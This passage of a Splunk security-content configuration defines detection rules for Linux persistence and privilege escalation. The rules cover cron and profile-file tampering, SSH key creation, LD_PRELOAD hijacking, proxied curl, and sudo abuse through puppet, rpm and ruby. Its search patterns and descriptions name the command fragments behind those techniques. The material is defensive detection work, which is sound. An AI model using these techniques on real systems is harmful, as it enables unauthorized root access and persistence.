Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = a commandline $process$ that may modify profile files in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Append Command To Profile Config File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.004", "T1546"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*echo*" AND Processes.process IN("*~/.bashrc", "*~/.bash_profile", "*/etc/profile", "~/.bash_login", "*~/.profile", "~/.bash_logout") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_append_command_to_profile_config_file_filter` [ESCU - Linux Possible Append Cronjob Entry on Existing Cronjob File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to detect potential tampering with cronjob files on a Linux system. It specifically searches for command lines that may be used to append code to existing cronjob files, a technique often employed by adversaries, malware, and red teamers for persistence or privilege escalation. Altering existing or sometimes normal cronjob script files allows malicious code to be executed automatically.\ The analytic operates by monitoring logs for specific process names, parent processes, and command-line executions from your endpoints. It specifically checks for any 'echo' command which modifies files in directories commonly associated with cron jobs such as '/etc/cron*', '/var/spool/cron/', and '/etc/anacrontab'. If such activity is detected, an alert is triggered.\ This behavior is worth identifying for a SOC because malicious cron jobs can lead to system compromises and unauthorized data access, impacting business operations and data integrity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to detect potential tampering with cronjob files on a Linux system. It specifically searches for command lines that may be used to append code to existing cronjob files, a technique often employed by adversaries, malware, and red teamers for persistence or privilege escalation. Altering existing or sometimes normal cronjob script files allows malicious code to be executed automatically.\ The analytic operates by monitoring logs for specific process names, parent processes, and command-line executions from your endpoints. It specifically checks for any 'echo' command which modifies files in directories commonly associated with cron jobs such as '/etc/cron*', '/var/spool/cron/', and '/etc/anacrontab'. If such activity is detected, an alert is triggered.\ This behavior is worth identifying for a SOC because malicious cron jobs can lead to system compromises and unauthorized data access, impacting business operations and data integrity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may arise from legitimate actions by administrators or network operators who may use these commands for automation purposes. Therefore, it's recommended to adjust filter macros to eliminate such false positives. action.escu.creation_date = 2021-12-17 action.escu.modification_date = 2021-12-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Append Cronjob Entry on Existing Cronjob File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Append Cronjob Entry on Existing Cronjob File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count from datamodel=Endpoint.Processes where Processes.process = "*echo*" AND Processes.process IN("*/etc/cron*", "*/var/spool/cron/*", "*/etc/anacrontab*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_append_cronjob_entry_on_existing_cronjob_file_filter` [ESCU - Linux Possible Cronjob Modification With Editor - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects potential unauthorized modifications to Linux cronjobs using text editors like "nano", "vi" or "vim". It identifies this behavior by tracking command-line executions that interact with paths related to cronjob configuration, a common Linux scheduling utility. Cronjob files may be manipulated by attackers for privilege escalation or persistent access, making such changes critical to monitor.\ The identified behavior is significant for a Security Operations Center (SOC) as it could indicate an ongoing attempt at establishing persistent access or privilege escalation, leading to data breaches, system compromise, or other malicious activities.\ In case of a true positive, the impact could be severe. An attacker with escalated privileges or persistent access could carry out damaging actions, such as data theft, sabotage, or further network penetration.\ To implement this analytic, ensure ingestion of logs tracking process name, parent process, and command-line executions from your endpoints. Utilize the Add-on for Linux Sysmon from Splunkbase if you're using Sysmon.\ Known false positives include legitimate administrative tasks, as these commands may also be used for benign purposes. Careful tuning and filtering based on known benign activity in your environment can minimize these instances. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects potential unauthorized modifications to Linux cronjobs using text editors like "nano", "vi" or "vim". It identifies this behavior by tracking command-line executions that interact with paths related to cronjob configuration, a common Linux scheduling utility. Cronjob files may be manipulated by attackers for privilege escalation or persistent access, making such changes critical to monitor.\ The identified behavior is significant for a Security Operations Center (SOC) as it could indicate an ongoing attempt at establishing persistent access or privilege escalation, leading to data breaches, system compromise, or other malicious activities.\ In case of a true positive, the impact could be severe. An attacker with escalated privileges or persistent access could carry out damaging actions, such as data theft, sabotage, or further network penetration.\ To implement this analytic, ensure ingestion of logs tracking process name, parent process, and command-line executions from your endpoints. Utilize the Add-on for Linux Sysmon from Splunkbase if you're using Sysmon.\ Known false positives include legitimate administrative tasks, as these commands may also be used for benign purposes. Careful tuning and filtering based on known benign activity in your environment can minimize these instances. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this commandline for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-17 action.escu.modification_date = 2021-12-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Cronjob Modification With Editor - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Cronjob Modification With Editor - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 30, "impact": 20, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name IN("nano","vim.basic") OR Processes.process IN ("*nano *", "*vi *", "*vim *")) AND Processes.process IN("*/etc/cron*", "*/var/spool/cron/*", "*/etc/anacrontab*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_possible_cronjob_modification_with_editor_filter` [ESCU - Linux Possible Ssh Key File Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to look for possible ssh key file creation on ~/.ssh/ folder. This technique is commonly abused by threat actors and adversaries to gain persistence and privilege escalation to the targeted host. by creating ssh private and public key and passing the public key to the attacker server. threat actor can access remotely the machine using openssh daemon service. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004", "T1098"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to look for possible ssh key file creation on ~/.ssh/ folder. This technique is commonly abused by threat actors and adversaries to gain persistence and privilege escalation to the targeted host. by creating ssh private and public key and passing the public key to the attacker server. threat actor can access remotely the machine using openssh daemon service. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can create file in ~/.ssh folders for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-01-11 action.escu.modification_date = 2022-01-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Possible Ssh Key File Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Possible Ssh Key File Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004", "T1098"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/.ssh*") by Filesystem.dest Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_possible_ssh_key_file_creation_filter` [ESCU - Linux Preload Hijack Library Calls - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious command that may hijack a library function in linux platform. This technique is commonly abuse by adversaries, malware author and red teamers to gain privileges and persist on the machine. This detection pertains to loading a dll to hijack or hook a library function of specific program using LD_PRELOAD command. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.006", "T1574"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious command that may hijack a library function in linux platform. This technique is commonly abuse by adversaries, malware author and red teamers to gain privileges and persist on the machine. This detection pertains to loading a dll to hijack or hook a library function of specific program using LD_PRELOAD command. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-22 action.escu.modification_date = 2021-12-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Preload Hijack Library Calls - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may hijack library function on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Preload Hijack Library Calls - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.006", "T1574"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious command that may hijack a library function in linux platform. This technique is commonly abuse by adversaries, malware author and red teamers to gain privileges and persist on the machine. This detection pertains to loading a dll to hijack or hook a library function of specific program using LD_PRELOAD command. action.notable.param.rule_title = Linux Preload Hijack Library Calls action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*LD_PRELOAD*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_preload_hijack_library_calls_filter` [ESCU - Linux Proxy Socks Curl - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies curl being utilized with a proxy based on command-line arguments - -x, socks, --preproxy and --proxy. This behavior is built into the MetaSploit Framework as a auxiliary module. What does socks buy an adversary? SOCKS4a extends the SOCKS4 protocol to allow a client to specify a destination domain name rather than an IP address. The SOCKS5 protocol is defined in RFC 1928. It is an incompatible extension of the SOCKS4 protocol; it offers more choices for authentication and adds support for IPv6 and UDP, the latter of which can be used for DNS lookups. The protocols, and a proxy itself, allow an adversary to evade controls in place monitoring traffic, making it harder for the defender to identify and track activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1090", "T1095"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies curl being utilized with a proxy based on command-line arguments - -x, socks, --preproxy and --proxy. This behavior is built into the MetaSploit Framework as a auxiliary module. What does socks buy an adversary? SOCKS4a extends the SOCKS4 protocol to allow a client to specify a destination domain name rather than an IP address. The SOCKS5 protocol is defined in RFC 1928. It is an incompatible extension of the SOCKS4 protocol; it offers more choices for authentication and adds support for IPv6 and UDP, the latter of which can be used for DNS lookups. The protocols, and a proxy itself, allow an adversary to evade controls in place monitoring traffic, making it harder for the defender to identify and track activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present based on proxy usage internally. Filter as needed. action.escu.creation_date = 2022-07-29 action.escu.modification_date = 2022-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Proxy Socks Curl - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land", "Ingress Tool Transfer"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ by user $user$ utilizing a proxy. Review activity for further details. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Proxy Socks Curl - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1090", "T1095"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies curl being utilized with a proxy based on command-line arguments - -x, socks, --preproxy and --proxy. This behavior is built into the MetaSploit Framework as a auxiliary module. What does socks buy an adversary? SOCKS4a extends the SOCKS4 protocol to allow a client to specify a destination domain name rather than an IP address. The SOCKS5 protocol is defined in RFC 1928. It is an incompatible extension of the SOCKS4 protocol; it offers more choices for authentication and adds support for IPv6 and UDP, the latter of which can be used for DNS lookups. The protocols, and a proxy itself, allow an adversary to evade controls in place monitoring traffic, making it harder for the defender to identify and track activity. action.notable.param.rule_title = Linux Proxy Socks Curl action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl Processes.process IN ("*-x *", "*socks4a://*", "*socks5h://*", "*socks4://*","*socks5://*", "*--preproxy *", "--proxy*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_proxy_socks_curl_filter` [ESCU - Linux Puppet Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = In computing, Puppet is a software configuration management tool which includes its own declarative language to describe system configuration. It is a model-driven solution that requires limited programming knowledge to use. If sudo right is given to the tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = In computing, Puppet is a software configuration management tool which includes its own declarative language to describe system configuration. It is a model-driven solution that requires limited programming knowledge to use. If sudo right is given to the tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Puppet Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 5}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Puppet Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*puppet*" AND Processes.process="*apply*" AND Processes.process="*-e*" AND Processes.process="*exec*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_puppet_privilege_escalation_filter` [ESCU - Linux RPM Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = RPM Package Manager is a free and open-source package management system. The name RPM refers to the .rpm file format and the package manager program itself. RPM was intended primarily for Linux distributions; the file format is the baseline package format of the Linux Standard Base. If sudo right is given to rpm utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = RPM Package Manager is a free and open-source package management system. The name RPM refers to the .rpm file format and the package manager program itself. RPM was intended primarily for Linux distributions; the file format is the baseline package format of the Linux Standard Base. If sudo right is given to rpm utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux RPM Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux RPM Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*rpm*--eval*" AND Processes.process="*lua:os.execute*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_rpm_privilege_escalation_filter` [ESCU - Linux Ruby Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Ruby is one of the most used and easy to use programming languages. Ruby is an open-source, object-oriented interpreter that can be installed on a Linux system. If sudo right is given to ruby application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Ruby is one of the most used and easy to use programming languages. Ruby is an open-source, object-oriented interpreter that can be installed on a Linux system. If sudo right is given to ruby application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Ruby Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Ruby Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*ruby*-e*" AND Processes.process="*exec*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_ruby_privilege_escalation_filter` [ESCU - Linux Service File Created In Systemd Directory - Rule] action.escu = 0 